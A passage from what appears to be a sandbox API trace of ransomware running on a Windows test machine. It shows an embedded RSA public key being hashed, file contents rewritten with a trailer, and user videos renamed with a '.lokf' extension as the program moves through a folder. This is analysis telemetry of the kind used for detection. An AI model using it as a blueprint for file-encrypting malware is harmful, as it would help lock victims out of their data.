nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xee4b, lpOverlapped=0x0) returned 1 [0060.202] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.202] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.202] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.202] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.202] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.202] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.202] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.202] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.203] GetLastError () returned 0x0 [0060.203] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.203] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.203] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.203] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.203] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee50) returned 0x9c8bae8 [0060.203] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88e18 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c08 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88e60 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c20 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c50 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c68 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.204] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c50 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c68 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c68 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85c50 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c68 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c50 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.204] GetCurrentThreadId () returned 0x9e0 [0060.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8a0a0 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.205] GetCurrentThreadId () returned 0x9e0 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c50 [0060.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c68 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c38 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c80 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c50 | out: hHeap=0x660000) returned 1 [0060.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c50 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c50 | out: hHeap=0x660000) returned 1 [0060.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c80 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c68 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c38 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c20 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88e60 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.208] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0xee46, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0xee46, lpOverlapped=0x0) returned 1 [0060.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.208] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xee4b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.208] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0060.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.209] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0060.209] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.209] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.209] CloseHandle (hObject=0x5cc) returned 1 [0060.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a90 [0060.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0060.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269a90 | out: hHeap=0x660000) returned 1 [0060.210] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\48nag.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\48nag.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\48nag.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\48nag.mkv.lokf")) returned 1 [0060.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.211] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0060.211] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c2b540, ftCreationTime.dwHighDateTime=0x1d4ca9d, ftLastAccessTime.dwLowDateTime=0x343bcb30, ftLastAccessTime.dwHighDateTime=0x1d4d15b, ftLastWriteTime.dwLowDateTime=0x343bcb30, ftLastWriteTime.dwHighDateTime=0x1d4d15b, nFileSizeHigh=0x0, nFileSizeLow=0x1614f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7_vc_tYF-W1fe3j1GZ.mp4", cAlternateFileName="7_VC_T~1.MP4")) returned 1 [0060.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0060.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.212] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\7_vc_tYF-W1fe3j1GZ.mp4") returned=".mp4" [0060.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\7_vc_tYF-W1fe3j1GZ.mp4" (normalized: "c:\\users\\5p5nrgjn0js 